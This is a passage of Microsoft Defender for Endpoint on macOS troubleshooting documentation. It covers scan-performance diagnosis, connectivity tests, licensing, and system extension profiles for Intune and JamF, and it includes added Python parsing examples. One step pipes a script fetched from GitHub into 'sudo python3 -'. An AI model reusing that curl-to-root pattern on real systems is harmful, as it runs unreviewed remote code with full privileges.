100%[===========================================>] 1,020 --.-K/s in 0s

5. Next, type the following commands:

Bash

chmod +x high_cpu_parser.py

Bash

cat real_time_protection.json | python high_cpu_parser.py > real_time_protection.log

The output of the above is a list of the top contributors to performance issues. The
first column is the process identifier (PID), the second column is the process name,
and the last column is the number of scanned files, sorted by impact.

For example, the output of the command will be something like the below:

Output

... > python ~/repo/mdatp-xplat/linux/diagnostic/high_cpu_parser.py <~Downloads/output.json | head -n 10
27432 None 76703
73467 actool 1249
73914 xcodebuild 1081
73873 bash 1050
27475 None 836
1 launchd 407
73468 ibtool 344
549 telemetryd_v1 325
4764 None 228
125 CrashPlanService 164

To improve the performance of Defender for Endpoint on Mac, locate the one with
the highest number under the Total files scanned row and add an exclusion for it.
For more information, see Configure and validate exclusions for Defender for
Endpoint on macOS.

Note

The application stores statistics in memory and only keeps track of file activity
since it was started and real-time protection was enabled. Processes that were
launched before or during periods when real time protection was off are not
counted. Additionally, only events which triggered scans are counted.

6. Configure Microsoft Defender for Endpoint on macOS with exclusions for the
processes or disk locations that contribute to the performance issues and re-
enable real-time protection.

See Configure and validate exclusions for Microsoft Defender for Endpoint on
macOS for details.
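Steps 3 to 6 above boil down to: collect the statistics as JSON, rank processes by scan count, and turn the top entries into exclusion candidates. The following Python is an added example and is not Microsoft's high_cpu_parser.py; the JSON field names it reads (id, name, path, total_files_scanned) are assumptions modelled on the three columns the article describes, so compare them with a real real_time_protection.json before using it on your own data. The input is constructed; its counts echo the article's sample listing and the paths are illustrative.

```python
"""Rank processes by real-time protection (RTP) scan activity and pick
exclusion candidates from the statistics JSON.

Added example, not Microsoft's high_cpu_parser.py. Field names
(id, name, path, total_files_scanned) are assumptions based on the
columns the article describes.
"""
import json
from typing import Any, Dict, List

# Constructed sample, not real diagnostic output. Counts echo the article's
# sample listing; the paths are illustrative.
SAMPLE_JSON = json.dumps([
    {"id": 27432, "name": None, "path": None, "total_files_scanned": 76703},
    {"id": 73467, "name": "actool",
     "path": "/Applications/Xcode.app/Contents/Developer/usr/bin/actool",
     "total_files_scanned": 1249},
    {"id": 73914, "name": "xcodebuild",
     "path": "/Applications/Xcode.app/Contents/Developer/usr/bin/xcodebuild",
     "total_files_scanned": 1081},
    {"id": 1, "name": "launchd", "path": "/sbin/launchd",
     "total_files_scanned": 407},
])


def load_stats(raw: str) -> List[Dict[str, Any]]:
    """Load the JSON array, skipping any banner text printed before it."""
    start = raw.find("[")
    if start < 0:
        raise ValueError("no JSON array found in input")
    return json.loads(raw[start:])


def rank(stats: List[Dict[str, Any]], top: int = 10) -> List[Dict[str, Any]]:
    """Highest scan counts first, like the article's sorted listing."""
    return sorted(stats, key=lambda s: s.get("total_files_scanned", 0),
                  reverse=True)[:top]


def format_rows(stats: List[Dict[str, Any]]) -> List[str]:
    """PID, process name, scanned files: the three columns the article shows."""
    return [f"{s['id']} {s.get('name') or 'None'} {s.get('total_files_scanned', 0)}"
            for s in rank(stats)]


def exclusion_candidates(stats: List[Dict[str, Any]],
                         min_scans: int = 1000) -> List[str]:
    """Paths worth reviewing for an exclusion: heavy scanners with a resolvable
    name and path. Entries without a name (shown as None in the listing) can't
    be excluded by process path and need separate investigation, so they are
    skipped. Every exclusion removes coverage, so review each path before
    adding it rather than excluding the list wholesale."""
    return [s["path"] for s in rank(stats)
            if s.get("name") and s.get("path")
            and s.get("total_files_scanned", 0) >= min_scans]


if __name__ == "__main__":
    stats = load_stats(SAMPLE_JSON)
    print("\n".join(format_rows(stats)))
    print("candidates:", exclusion_candidates(stats))
```

The min_scans threshold is deliberately a parameter: on a build server a few thousand scans per process is normal, on a laptop it is not, and a fixed cut-off copied from one fleet to another will produce either no candidates or far too many.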

Troubleshoot performance issues using Microsoft Defender for Endpoint Client Analyzer

Applies to:

Performance issues of all available Defender for Endpoint components such as AV
and EDR

The Microsoft Defender for Endpoint Client Analyzer (MDECA) can collect traces, logs,
and diagnostic information in order to troubleshoot performance issues on onboarded
devices on macOS.

Note

The Microsoft Defender for Endpoint Client Analyzer tool is regularly used by
Microsoft Customer Support Services (CSS) to collect information such as (but
not limited to) IP addresses and PC names that help troubleshoot issues you
may be experiencing with Microsoft Defender for Endpoint. For more
information about our privacy statement, see Microsoft Privacy Statement.
As a general best practice, update the Microsoft Defender for Endpoint agent
to the latest available version and confirm that the issue still persists before
investigating further.

To run the client analyzer for troubleshooting performance issues, see Run the client
analyzer on macOS and Linux.

Note

If the performance problem persists after you follow the preceding steps, please
contact customer support for further instructions and mitigation.

See also
Investigate agent health issues


Troubleshoot cloud connectivity issues
for Microsoft Defender for Endpoint on
macOS
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Platform: macOS

This topic describes how to troubleshoot cloud connectivity issues for Microsoft
Defender for Endpoint on macOS.

Run the connectivity test

To test if Defender for Endpoint on Mac can communicate to the cloud with the current
network settings, run a connectivity test from the command line:

Bash

mdatp connectivity test

Expected output:

Output

Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://eu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://wu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://x.cp.wd.microsoft.com/api/report ... [OK]
Testing connection with https://winatp-gw-cus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-eus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-weu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-neu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-ukw.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-uks.microsoft.com/test ... [OK]
Testing connection with https://eu-v20.events.data.microsoft.com/ping ... [OK]
Testing connection with https://us-v20.events.data.microsoft.com/ping ... [OK]
Testing connection with https://uk-v20.events.data.microsoft.com/ping ... [OK]
Testing connection with https://v20.events.data.microsoft.com/ping ... [OK]

If the connectivity test fails, check if the device has Internet access and if any of the
endpoints required by the product are blocked by a proxy or firewall.

Failures with curl error 35 or 60 indicate certificate pinning rejection, which points to
SSL or HTTPS inspection on the network path. See the instructions below regarding SSL
inspection configuration.
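When you run the connectivity test across a fleet, the useful split is between endpoints that are simply blocked and endpoints whose failure is really a TLS interception problem. The following Python is an added example, not part of Microsoft's article or tooling: it parses the test output line by line, treats curl exit codes 35 and 60 as the certificate-pinning signature the paragraph above describes, and lists the hosts that need an SSL-inspection bypass. The [OK] lines follow the format shown above; the "[ERROR (N)]" failure format, with N being the curl exit code, is an assumption made for this example, so adjust LINE_RE if your build prints failures differently. The sample output is constructed.

```python
"""Parse `mdatp connectivity test` output and classify failures.

Added example, not Microsoft's code. The '[ERROR (N)]' failure format is an
assumption; the [OK] format matches the article's expected output.
"""
import re
from typing import Any, Dict, List
from urllib.parse import urlparse

LINE_RE = re.compile(
    r"^Testing connection with (\S+) \.\.\. \[(OK|ERROR)(?: \((\d+)\))?\]$")

# curl exit codes: 35 = TLS handshake failure, 60 = peer certificate could not
# be verified. Both are what certificate pinning reports when an inspecting
# proxy terminates the TLS session and re-signs it with its own certificate.
TLS_INSPECTION_CODES = {35, 60}

# Constructed sample mixing healthy and failing endpoints.
SAMPLE_OUTPUT = """Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://x.cp.wd.microsoft.com/api/report ... [ERROR (60)]
Testing connection with https://winatp-gw-cus.microsoft.com/test ... [ERROR (35)]
Testing connection with https://winatp-gw-eus.microsoft.com/test ... [OK]
Testing connection with https://v20.events.data.microsoft.com/ping ... [ERROR (7)]
"""


def parse(output: str) -> List[Dict[str, Any]]:
    """One record per 'Testing connection with' line; other lines are ignored."""
    results: List[Dict[str, Any]] = []
    for line in output.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        url, status, code = match.groups()
        results.append({
            "url": url,
            "ok": status == "OK",
            "curl_code": int(code) if code else None,
        })
    return results


def classify(result: Dict[str, Any]) -> str:
    """ok / tls-inspection / blocked-or-unreachable, per the article's guidance."""
    if result["ok"]:
        return "ok"
    if result["curl_code"] in TLS_INSPECTION_CODES:
        return "tls-inspection"
    # Anything else (e.g. curl 7, failed to connect) is a proxy/firewall block
    # or a device without Internet access.
    return "blocked-or-unreachable"


def summarize(output: str) -> Dict[str, int]:
    """Count results per class, so a fleet-wide report is a one-liner."""
    counts: Dict[str, int] = {}
    for result in parse(output):
        label = classify(result)
        counts[label] = counts.get(label, 0) + 1
    return counts


def hosts_needing_bypass(output: str) -> List[str]:
    """Hostnames to add to the SSL-inspection exception list."""
    hosts = {urlparse(r["url"]).hostname for r in parse(output)
             if classify(r) == "tls-inspection"}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    print(summarize(SAMPLE_OUTPUT))
    print(hosts_needing_bypass(SAMPLE_OUTPUT))
```

Keeping the two failure classes apart matters operationally: a bypass rule fixes the tls-inspection group, while the blocked-or-unreachable group needs a firewall or proxy allow-list change, and mixing them up sends the ticket to the wrong team.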

Troubleshooting steps for environments without proxy or with Proxy autoconfig (PAC) or with Web Proxy Autodiscovery Protocol (WPAD)

Use the following procedure to test that a connection is not blocked in an environment
without a proxy or with Proxy autoconfig (PAC) or with Web Proxy Autodiscovery
Protocol (WPAD).

If a proxy or firewall is blocking anonymous traffic, make sure that anonymous traffic is
permitted in the previously listed URLs.

Warning

Authenticated proxies are not supported. Ensure that only PAC, WPAD, or a static
proxy is being used. SSL inspection and intercepting proxies are also not supported
for security reasons. Configure an exception for SSL inspection and your proxy
server to directly pass through data from Microsoft Defender for Endpoint on
macOS to the relevant URLs without interception. Adding your interception
certificate to the global store will not allow for interception. To test that a
connection is not blocked: In a browser such as Microsoft Edge for Mac or Safari
open https://x.cp.wd.microsoft.com/api/report and
https://cdn.x.cp.wd.microsoft.com/ping .

Optionally, in Terminal, run the following command:

Bash

curl -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'

The output from this command should be similar to:

Output

OK https://x.cp.wd.microsoft.com/api/report
OK https://cdn.x.cp.wd.microsoft.com/ping


Troubleshoot license issues for
Microsoft Defender for Endpoint on
macOS
Article • 12/07/2023

Applies to:

Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

No license found
When Microsoft Defender for Endpoint on macOS is being deployed, an error message
with an x on top of the Microsoft Defender for Endpoint on macOS shield appears.

Select the x symbol.

Message
When you select the x symbol, you'll see options as shown in the following screenshot:

When you select Action needed, you'll get the error message as shown in the following
screenshot:

You can also encounter this message in a different way: if you enter mdatp health
(without the double quotes) in the terminal, the message shown in the following
screenshot is displayed:

Cause
1. You've deployed and/or installed the Microsoft Defender for Endpoint on macOS
package Download installation packages, but might not have run the configuration
script Download the onboarding package that contains the license settings. For
information on troubleshooting in this scenario, see For not running the
configuration script.

2. You can also encounter this error message when the Microsoft Defender for
Endpoint on macOS agent isn't up to date. For information on troubleshooting in
this scenario, see For Microsoft Defender for Endpoint on macOS not being up to
date.

3. You can also encounter this error message if you haven't assigned a license to the
user. For information on troubleshooting in this scenario, see For not assigning a
license to the user.

Solutions

For not running the configuration script

This section describes the troubleshooting measures when the error/warning message is
caused by non-execution of the configuration script that contains the license settings
after you have deployed and/or installed the Microsoft Defender for Endpoint on
macOS package.

Depending on the deployment management tool used, follow the tool-specific
instructions to onboard the package (register the license) as described in the following
table:

Management tool: License deployment instructions (onboarding instructions)

Intune: Download the onboarding package
JamF: Step 1: Get the Microsoft Defender for Endpoint onboarding package
Other MDM: License settings
Manual installation: Download installation and onboarding packages; and Onboarding Package

Note

If the onboarding package runs correctly, the licensing information will be located
in /Library/Application Support/Microsoft/Defender/com.microsoft.wdav.atp.plist.

For Microsoft Defender for Endpoint on macOS not being up to date

For scenarios where Microsoft Defender for Endpoint on macOS isn't up to date, you'll
need to update the agent.

For not assigning a license to the user

1. In the Microsoft Defender portal (security.microsoft.com):

a. Select Settings. The Settings screen appears.

b. Select Endpoints. The Endpoints screen appears.

c. Select Licenses.

d. Select View and purchase licenses in the Microsoft 365 admin center. The
following screen in the Microsoft 365 admin center portal appears:

e. Check the checkbox of the license you want to purchase from Microsoft, and
select it. The screen displaying detail of the chosen license appears:

f. Select the Assign licenses link. The following screen appears:

g. Select + Assign licenses.

h. Enter the name or email address of the person to whom you want to assign this
license. The following screen appears, displaying the details of the chosen license
assignee and a list of options.

i. Check the checkboxes for Microsoft 365 Advanced Auditing, Microsoft
Defender XDR, and Microsoft Defender for Endpoint.

j. Select Save.

After applying whichever of these solutions fits your scenario, run mdatp health. If the
licensing issue has been resolved, you should see the following results:

Sign in with your Microsoft account

Message
Sign in with your Microsoft account to get started.

Create new account or Switch to enterprise app.

Cause
You've downloaded and installed Microsoft Defender for individuals on macOS on top
of previously installed Microsoft Defender for Endpoint.

Solution
Select Switch to enterprise app to switch to the Enterprise experience.

You can also suppress switching to the experience for individuals on MDM-enrolled
machines by including userInterface/consumerExperience in the Defender settings:

XML

<key>userInterface</key>
<dict>
    <key>consumerExperience</key>
    <string>disabled</string>
</dict>


Troubleshoot system extension issues in
Microsoft Defender for Endpoint on
macOS
Article • 08/30/2023

Applies to:

Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

You can submit feedback by opening Microsoft Defender for Endpoint on Mac on your
device and by navigating to Help > Send feedback.

Another option is to submit feedback via Microsoft Defender XDR by launching
security.microsoft.com and selecting the Give feedback tab.

This article provides information on how to troubleshoot issues with the system
extension that's installed as part of Microsoft Defender for Endpoint on macOS.

Starting with macOS Big Sur (11), Apple's macOS requires all system extensions to be
explicitly approved before they're allowed to run on the device.

Symptom
You'll notice that Microsoft Defender for Endpoint has an x symbol in the shield, as
shown in the following screenshot:

If you click the shield with the x symbol, you'll get options as shown in the following
screenshot:

Click Action needed.

The screen as shown in the following screenshot appears:

You can also run mdatp health: it reports whether real-time protection is enabled but
not available, which indicates that the system extension isn't approved to run on your
device.

Bash

mdatp health

The output on running mdatp health is:

Output

healthy : false
health_issues : ["no active event provider", "network event provider not running", "full disk access has not been granted"]
...
real_time_protection_enabled : unavailable
real_time_protection_available: unavailable
...
full_disk_access_enabled : false

The output report displayed on running mdatp health is shown in the following
screenshot:

Cause
macOS requires that a user manually and explicitly approves certain functions that an
application uses, for example, system extensions, running in background, sending
notifications, full disk access, and so on. Microsoft Defender for Endpoint relies on these
functions and can't work properly until all these consents are received from a user.

If you didn't approve the system extension during the deployment/installation of
Microsoft Defender for Endpoint on macOS, perform the following steps:

1. Check the system extensions by running the following command in the terminal:

Bash

systemextensionsctl list

You'll notice that both Microsoft Defender for Endpoint on macOS extensions are in the
[activated waiting for user] state.

2. In the terminal, run the following command:

Bash

mdatp health --details system_extensions

You'll get the following output:

Output

network_extension_enabled : false
network_extension_installed : true
endpoint_security_extension_ready : false
endpoint_security_extension_installed : true

This output is shown in the following screenshot:


The following files might be missing if you're managing it via Intune, JamF, or another
MDM solution. Each entry lists the macOS setting needed for MDE on macOS to function
properly, the MobileConfig (plist) file that delivers it, and the corresponding "mdatp
health" console command output field:

System extension
    MobileConfig (plist): "/Library/Managed Preferences/com.apple.system-extension-policy.plist"
    "mdatp health" output: real_time_protection_subsystem

Network Filter extension
    MobileConfig (plist): "/Library/Managed Preferences/com.apple.webcontent-filter.plist"
    "mdatp health" output: network_events_subsystem

Privacy Preference Policy Controls (PPPC, aka TCC (Transparency, Consent & Control), Full Disk Access (FDA))
    MobileConfig (plist): "/Library/Managed Preferences/com.apple.TCC.configuration-profile-policy.plist"
    "mdatp health" output: full_disk_access_enabled

End-user notifications
    MobileConfig (plist): "/Library/Managed Preferences/com.apple.notificationsettings.plist"
    "mdatp health" output: n/a

Background services
    MobileConfig (plist): "/Library/Managed Preferences/servicemanagement.plist"
    "mdatp health" output: n/a

Accessibility
    MobileConfig (plist): "/Library/Managed Preferences/com.apple.TCC.configuration-profile-policy.plist"
    "mdatp health" output: full_disk_access_enabled (for DLP)

To troubleshoot the issue of missing files to make Microsoft Defender for Endpoint on
macOS work properly, see Microsoft Defender for Endpoint on Mac.
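The mdatp health output shown in the Symptom section and the table above can be tied together in a script, which is handy when you have to check many MDM-managed devices for missing consents. The following Python is an added example, not Microsoft's code: it parses the "key : value" lines that mdatp health and mdatp health --details system_extensions print, and for each consent that is not granted names the managed-preference plist from the table that should have delivered it. The health text is constructed from the fields shown in this article. The mapping from the endpoint_security_extension_ready, network_extension_enabled and full_disk_access_enabled fields to the plist files is an assumption made for this example (the table lists real_time_protection_subsystem and network_events_subsystem as the health fields for the first two rows), so adjust CONSENT_CHECKS to match what your agent version reports.

```python
"""Parse `mdatp health` key/value output and map unmet consents to the
managed-preference profile that should have granted them.

Added example, not Microsoft's code. The field-to-plist mapping in
CONSENT_CHECKS is an assumption modelled on the article's table.
"""
import json
from typing import Any, Dict, List, Tuple

# Constructed sample output, not captured from a real device; the field
# names and values are the ones the article shows.
SAMPLE_HEALTH = """healthy                                     : false
health_issues                               : ["no active event provider", "network event provider not running", "full disk access has not been granted"]
...
real_time_protection_enabled                : unavailable
real_time_protection_available              : unavailable
full_disk_access_enabled                    : false
network_extension_enabled                   : false
network_extension_installed                 : true
endpoint_security_extension_ready           : false
endpoint_security_extension_installed       : true
"""

# (health field, value expected when consent is granted, macOS setting,
#  managed-preference plist to check). Assumed mapping, see lead-in.
CONSENT_CHECKS: List[Tuple[str, Any, str, str]] = [
    ("endpoint_security_extension_ready", True, "System extension",
     "/Library/Managed Preferences/com.apple.system-extension-policy.plist"),
    ("network_extension_enabled", True, "Network Filter extension",
     "/Library/Managed Preferences/com.apple.webcontent-filter.plist"),
    ("full_disk_access_enabled", True, "Full Disk Access (PPPC/TCC)",
     "/Library/Managed Preferences/com.apple.TCC.configuration-profile-policy.plist"),
]


def parse_value(raw: str) -> Any:
    """Booleans and JSON lists become Python values; anything else stays a string
    (e.g. 'unavailable', which is deliberately not treated as False)."""
    if raw == "true":
        return True
    if raw == "false":
        return False
    if raw.startswith("["):
        return json.loads(raw)
    return raw


def parse_health(text: str) -> Dict[str, Any]:
    """Turn 'key : value' lines into a dict; '...' and blank lines are skipped."""
    health: Dict[str, Any] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep or not key.strip():
            continue
        health[key.strip()] = parse_value(value.strip())
    return health


def missing_consents(health: Dict[str, Any]) -> List[Dict[str, str]]:
    """Consents not yet granted, with the plist whose absence would explain it."""
    missing: List[Dict[str, str]] = []
    for field, expected, setting, plist in CONSENT_CHECKS:
        actual = health.get(field)
        if actual != expected:
            missing.append({"field": field, "actual": str(actual),
                            "setting": setting, "check": plist})
    return missing


if __name__ == "__main__":
    for item in missing_consents(parse_health(SAMPLE_HEALTH)):
        print(f"{item['setting']}: {item['field']}={item['actual']} -> verify {item['check']}")
```

A field that is absent altogether is reported the same way as one that is false: on an older agent that does not emit a given field, that is the cue to update CONSENT_CHECKS rather than to push a profile.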

Solution
This section describes how to approve functions such as the system extension,
background services, notifications, full disk access, and so on using the management
tools, namely Intune, JamF, Other MDM, and the method of manual deployment.
To perform these functions using these management tools, see:

Intune
JamF
Other MDM
Manual deployment

Prerequisites
Prior to approving the system extension (using any of the specified management tools),
ensure that the following prerequisites are fulfilled:

Step 1: Are the profiles coming down to your macOS?

If you're using Intune, see Manage macOS software update policies in Intune.

1. Click the ellipses (three dots).

2. Select Refresh devices. The screen as shown in the following screenshot appears:

3. In Launchpad, type System Preferences.

4. Double-click Profiles.

Note

If you aren't MDM joined, you won't see Profiles as an option. Contact your
MDM support team to see why the Profiles option isn't visible. You should be
able to see the different profiles such as System Extensions, Accessibility,
Background Services, Notifications, Microsoft AutoUpdate, and so on, as
shown in the preceding screenshot.

If you're using JamF, use sudo jamf policy. For more information, see Policy
Management.

Step 2: Ensure that the profiles needed for Microsoft Defender for
Endpoint are enabled

The section Sections that provide guidance on enabling profiles needed for Microsoft
Defender for Endpoint explains how to address this issue, depending on the method
that you used to deploy Microsoft Defender for Endpoint on macOS.

Note

A proper naming convention for your configuration profiles is a real advantage. We
recommend the following naming scheme: Name of the Setting(s) [(additional
info)] - Platform - Set - Policy-Type. For example, FullDiskAccess (piloting) -
macOS - Default - MDE.

Using the recommended naming convention enables you to confirm that the correct
profiles are dropping down at the time of checking.

Tip

To ensure that the correct profiles are coming down, instead of typing the
.mobileconfig (plist) by hand, you can download the profile from GitHub, which
avoids typos such as elongated hyphens.

In terminal, enter the following syntax:

curl -O https://URL

For example:

Bash

curl -O https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mobileconfig/profiles/sysext.mobileconfig

Sections that provide guidance on enabling profiles needed for Microsoft Defender for Endpoint

1. Function: Approve System Extensions
Mobile config (plist): https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/sysext.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Must approve the extension by going to Security Preferences or
System Preferences > Security & Privacy and then selecting Allow.

2. Function: Network Filter
Mobile config (plist): https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/netfilter.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Must approve the extension by going to Security Preferences or
System Preferences > Security & Privacy and then selecting Allow.

3. Function: Privacy Preference Policy Controls (PPPC, aka TCC (Transparency, Consent & Control), Full Disk Access (FDA))
Mobile config (plist): https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Must approve the extension by going to Security Preferences or
System Preferences > Security & Privacy > Privacy > Full Disk Access and
then selecting Allow, and checking the box next to the following:
Microsoft Defender
Microsoft Defender Security Extension

4. Function: Running in background
Mobile config (plist): https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/background_services.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Not applicable

5. Function: Sending notifications
Mobile config (plist): https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/notif.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Not applicable

6. Function: Accessibility
Mobile config (plist): https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/accessibility.mobileconfig
Applicable to:
Intune: Yes
JamF: Yes
Other MDM: Yes
Manual: Not applicable

Step 3: Test the installed profiles using the macOS built-in 'profile' tool.
It compares your profiles with what we have published in GitHub,
reporting inconsistent profiles or profiles missing altogether

1. Download the script from https://github.com/microsoft/mdatp-xplat/tree/master/macos/mdm .
2. Click Raw. The new URL will be
https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mdm/analyze_profiles.py .
3. Save it as analyze_profiles.py to Downloads by running the following commands in
terminal:

Bash

cd ~/Downloads
curl -O https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mdm/analyze_profiles.py

4. Run the profile analyzer python3 script without any parameters by executing the
following command in terminal:

Bash

cd ~/Downloads
sudo python3 analyze_profiles.py

Note

Sudo permissions are required to execute this command.

OR

5. Run the script directly from the Web by executing the following command (sudo
applies to the Python interpreter that runs the script, not to curl):

Bash

curl https://raw.githubusercontent.com/microsoft/mdatp-xplat/master/macos/mdm/analyze_profiles.py | sudo python3 -

Note

Sudo permissions are required to execute this command.

The output will show all potential issues with profiles.


Manage profiles and approve
extensions using Intune
Article • 08/30/2023

This article describes the procedures to follow to manage profiles properly using the
Intune management tool.

Intune

Intune System Extensions Policy

To approve the system extensions:

1. In Intune, select Manage > Device configuration, and then select Manage >
Profiles > Create Profile.

2. Choose a name for the profile. Change Platform=macOS to Profile
type=Extensions, and then select Create.

3. In the Basics tab, give a name to this new profile.

4. In the Configuration settings tab, add the following entries in the Allowed system
extensions section:

Bundle identifier          Team identifier

com.microsoft.wdav.epsext  UBF8T346G9
com.microsoft.wdav.netext  UBF8T346G9

5. In the Assignments tab, assign this profile to All Users & All devices.

6. Review and create this configuration profile.

Create the custom configuration profile

The custom configuration profile enables the network extension and grants Full Disk
Access to the Endpoint Security system extension.

1. Save the following content to a file named sysext.xml:

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
    <key>PayloadUUID</key>
    <string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadOrganization</key>
    <string>Microsoft Corporation</string>
    <key>PayloadIdentifier</key>
    <string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
    <key>PayloadDisplayName</key>
    <string>Microsoft Defender System Extensions</string>
    <key>PayloadDescription</key>
    <string/>
    <key>PayloadVersion</key>
    <integer>1</integer>
    <key>PayloadEnabled</key>
    <true/>
    <key>PayloadRemovalDisallowed</key>
    <true/>
    <key>PayloadScope</key>
    <string>System</string>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadUUID</key>
            <string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
            <key>PayloadType</key>
            <string>com.apple.webcontent-filter</string>
            <key>PayloadOrganization</key>
            <string>Microsoft Corporation</string>
            <key>PayloadIdentifier</key>
            <string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
            <key>PayloadDisplayName</key>
            <string>Approved Network Extension</string>
            <key>PayloadDescription</key>
            <string/>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>PayloadEnabled</key>
            <true/>
            <key>FilterType</key>
            <string>Plugin</string>
            <key>UserDefinedName</key>
            <string>Microsoft Defender Network Extension</string>
            <key>PluginBundleID</key>
            <string>com.microsoft.wdav</string>
            <key>FilterSockets</key>
            <true/>
            <key>FilterDataProviderBundleIdentifier</key>
            <string>com.microsoft.wdav.netext</string>
            <key>FilterDataProviderDesignatedRequirement</key>
            <string>identifier &quot;com.microsoft.wdav.netext&quot; and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
        </dict>
        <dict>
            <key>PayloadUUID</key>
            <string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
            <key>PayloadType</key>
            <string>com.apple.TCC.configuration-profile-policy</string>
            <key>PayloadOrganization</key>
            <string>Microsoft Corporation</string>
            <key>PayloadIdentifier</key>
            <string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
            <key>PayloadDisplayName</key>
            <string>Privacy Preferences Policy Control</string>
            <key>PayloadDescription</key>
            <string/>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>PayloadEnabled</key>
            <true/>
            <key>Services</key>
            <dict>
                <key>SystemPolicyAllFiles</key>
                <array>
                    <dict>
                        <key>Identifier</key>
                        <string>com.microsoft.wdav.epsext</string>
                        <key>CodeRequirement</key>
                        <string>identifier "com.microsoft.wdav.epsext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
                        <key>IdentifierType</key>
                        <string>bundleID</string>
                        <key>StaticCode</key>
                        <integer>0</integer>
                        <key>Allowed</key>
                        <integer>1</integer>
                    </dict>
                </array>
            </dict>
        </dict>
    </array>
</dict>
</plist>

Verify that the content was copied into the file correctly. From the terminal, run the
following command and confirm that it reports OK, as in the following example:

Bash

$ plutil -lint sysext.xml


sysext.xml: OK

Note that plutil -lint only checks that the file is a well-formed property list; it doesn't
validate the payload keys, bundle identifiers, or code requirement strings themselves.

Deploy this custom configuration profile


1. In Intune, select Manage > Device configuration, and then select Manage >
Profiles > Create profile.
2. Choose a name for the profile. For the Platform attribute, set the value as macOS
and for the Profile type attribute, set the value as Custom, and then select
Configure.
3. Open the configuration profile and upload the sysext.xml file you created above.
4. Select OK.
5. In the Assignments tab, assign this profile to All Users & All devices.
6. Review and create this configuration profile.


Manage system extensions using JamF
Article • 02/21/2024

This article describes the procedures to implement in the process of managing the
system extensions to ensure Microsoft Defender for Endpoint works properly on macOS.

JamF

JAMF System Extensions Policy


To approve the system extensions, perform the following steps:

1. Select Computers > Configuration Profiles, and then select Options > System
Extensions.

2. Select Allowed System Extensions from the System Extension Types drop-down
list.

3. Use UBF8T346G9 for Team ID.

4. Add the following bundle identifiers to the Allowed System Extensions list:

com.microsoft.wdav.epsext
com.microsoft.wdav.netext

Privacy Preferences Policy Control (also known as Full Disk Access)

Add the following JAMF payload to grant Full Disk Access to the Microsoft Defender for
Endpoint Security Extension. This policy is a prerequisite for running the extension on
your device.

1. Select Options > Privacy Preferences Policy Control.

2. Use com.microsoft.wdav.epsext as the Identifier and Bundle ID as Bundle type.

3. Set Code Requirement to identifier com.microsoft.wdav.epsext and anchor apple
generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate
leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] =
UBF8T346G9. The /* exists */ comments are part of the requirement syntax; enter them
exactly, including the asterisks.

4. Set App or service to SystemPolicyAllFiles and access to Allow.


Network Extension Policy


As part of the Endpoint Detection and Response capabilities, Microsoft Defender for
Endpoint on macOS inspects socket traffic and reports this information to the Microsoft
Defender portal. The following policy allows the network extension to perform this
functionality:

Note

